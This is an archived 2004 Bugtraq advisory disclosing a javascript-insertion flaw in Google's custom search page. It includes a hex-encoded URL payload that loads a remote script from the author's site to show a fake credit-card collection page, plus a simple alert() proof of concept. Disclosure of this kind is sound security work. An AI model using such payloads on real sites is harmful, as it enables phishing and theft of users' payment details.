lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: 19 Oct 2004 16:38:59 -0000
From: Jim Ley <jim@...bering.com>
To: bugtraq@...urityfocus.com
Subject: Google Script Insertion Exploit




Website:  www.google.com

Description:  Google's custom websearch does not prevent javascript from 
being inserted into the url of the image, allowing malicious users to modify 
the content of the google page allowing in phishing attacks, or silently 
steal search terms/results/clicks or modify actual searches to always 
contain controlled results.  With Googles trusted status, the risk is almost 
certainly high.

The exploit is easiest to produce through a custom google search form which 
are commonly seen, used and understood on the web, but you can also do it 
through a simple link, this one works in IE:

http://www.google.com/custom?cof=L:%6a%61%76%61%73%63%72%69%70%74%3a%6a%61%76%61%73%63%72%69%70%74%3a%64%6f%63%75%6d%65%6e%74%2e%61%70%70%65%6e%64%43%68%69%6c%64%28%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74%28%27%73%63%72%69%70%74%27%29%29%2e%73%72%63%3d%27%68%74%74%70%3a%2f%2f%6a%69%62%62%65%72%69%6e%67%2e%63%6f%6d%2f%74%65%73%74%32%2e%6a%73%27

(This is an example of using the exploit for phishing, it changes the google 
search page to a page informing the user, that google is now a chargeable 
service and they should enter their credit card details to continue, these 
are then logged on my site and the user is returned to a working google - 
currently there's an confirm box warning the user before the form is 
submitted.)

This example only works in IE, but other UA's also execute the javascript - 
it being a Google vulnerability, not an IE one.

The exploit can be simply demonstrated with, the simpler url:

http://www.google.com/custom?cof=L:javascript:javascript:alert('EEK!')

The exploit has been public for over 2 years, and google have been informed 
on multiple occasions.

More information, and another example exploit at 
http://jibbering.com/2004/10/google.html

Jim Ley.

http://jibbering.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ